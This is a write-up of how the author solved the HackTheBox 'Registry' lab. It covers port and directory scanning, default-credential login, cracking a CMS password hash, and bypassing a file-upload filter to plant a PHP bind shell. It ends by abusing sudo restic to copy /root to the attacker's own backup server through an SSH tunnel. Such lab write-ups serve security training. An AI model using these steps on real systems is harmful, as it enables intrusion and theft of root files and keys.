This is a write-up on how I solved Registry from HackTheBox.
Hack the Box is an online platform to test and advance your skills in penetration testing and cybersecurity.
About this box:
One of my favorite boxes from HackTheBox, very real-world applicable. There are lots of steps, but it’s very straightforward and you probably have already found your next step before you know how to use it, we will see a lot of common mistakes.
Actually, Registry was my first Hard level box.
Use Nmap to scan the target ports:
nmap Network exploration tool and security / port scanner
-sV (Version detection)
-sC Performs a script scan using the default set of scripts.
-oA for output
Only three ports are opened 22, 80 and 443. With the Nmap scan, We also got virtual host from SSL-cert subject— docker.registry.htb
Let's start with port 80, we have default Nginx welcome page
The same thing on Port 443, default Ngnix page
Okay, let’s see what we got on docker.registry.htb
We can access it via adding it to
/etc/hosts file, open it with your favorite text editor and add the virtual host.
sudo vim /etc/hosts
We have a blank page on
A registry is a storage and content delivery system, holding named Docker images, available in different tagged versions.
Enumerate both — 10.10.10.159 and docker.registry.htb
We can use Gobuster for directory enumeration.
$ gobuster dir -u http://10.10.10.159/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o ip-enum -t 20
$ gobuster dir -u http://docker.registry.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o vhost-enum -t 20
So far, so good we have a
bolt directory on
v2 directory on
docker.registry.htb — let’s check them.
http://10.10.10.159/bolt which contains the official website information of bolt (CMS website)
We have here default page of bolt cms, we can run Gobuster for directory enumeration in the background and move on to the
Oh, authorization is required on
If we try weak credentials such as
admin:admin — It works perfectly
Okay, we are in.
A registry is a storage and content delivery system, holding named Docker images. — https://docs.docker.com/registry/introduction/
docker.registry.htb/v2/_catalog to view the mirror information under this repository.
Found that the warehouse has a mirror called
bolt-image. There should be a breach in the image.
The next step is to pull the image.
We need to install docker and make some change in configuration (Because of no SSL certificate)
$ curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -$ echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list$ sudo apt-get update$ sudo apt-get install docker-ce
We have docker, the next step is to make docker accept an insecure connection.
sudo docker login docker.registry.htb:443
The next step is to pull the latest docker image.
sudo docker pull docker.registry.htb:443/bolt-image:latest
Now run the docker image to access the content inside of the container.
sudo docker run -it docker.registry.htb:443/bolt-image:latest
Get the user
We have an SSH private key that is protected by a passphrase.
After some digging, we have the passphrase in
Let’s login with SSH
$ chmod 600 id_rsa$ ssh -i id_rsa email@example.com
And we can submit user hash for 20 points.
Get www-data user
Remember bolt? We have it in /var/www/html/
In that directory, we also have script backup.php script which is owned by the root user. This script seems to be interesting but we don’t have permission to change or execute it.
Every CMS has database files.
After some searching, we can find the database file
Download it with scp and check what we have
$ scp -i id_rsa firstname.lastname@example.org:/var/www/html/bolt/app/database/bolt.db ./
We can use sqlite3 to get information from the database file
Grab password and crack it with John
$ john --wordlist=/usr/share/wordlists/rockyou.txt bolt_db_hash
And we have the password
Remember our scan which we left in the background?
/bolt/bolt directory which is a login page for bolt cms.
We can log in with the credentials
Get www-data shell
We can’t just upload the PHP file because it is restricted.
We can’t get a reverse shell, because it is blocked with some kind of firewall. Let’s do it with bind shell.
From the research, we know that we can add
.PHP extension to the configuration file and bypass the PHP upload restriction.
Add the PHP extension in config.yml and upload the shell again
It worked, we have our PHP bind shell on it.
Open the URL to trigger the shell and connect it with NC.
rlwrap — is a very handy tool, it let us use arrow keys
Okay, We have www-data shell and we can run
/usr/bin/restic backup -r test* -command with root privilege.
BUT what we can with it?
Restic is software that does backups ¯\_(ツ)_/¯
After understanding some basic operations, the restic is not difficult. First, we need to install the restic and REST server locally.
sudo apt install restic
Then, set up a backup repository.
restic init --repo /tmp/registry_bak
Install rest-server and run it
Before you try to install it make sure that your box has go language version > 1.7
rest-server --path /tmp/registry_bak --no-auth --listen 0.0.0.0:8002
Then we need to run the backup command with the www-data user.
Because the target server appears to have some kind of firewall, it is not possible to connect to the external server. So in order to back up the data locally, we need SSH Remote port forwarding.
ssh -i id_rsa -R 8002:127.0.0.1:8002 email@example.com
Create a file that contains the password, and backup the /root directory.
From the root directory, we can grab root.txt and ssh private key
$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8002/ /root/ -p pass
Backup is done!
Now Restore backup and read root.txt
$ restic -r /tmp/registry_bak/ restore latest --target ./registry_restored
Or grab the id_rsa and ssh with the root user.
I hope you enjoyed, follow me for future posts.
Twitter — https://twitter.com/ls4cfk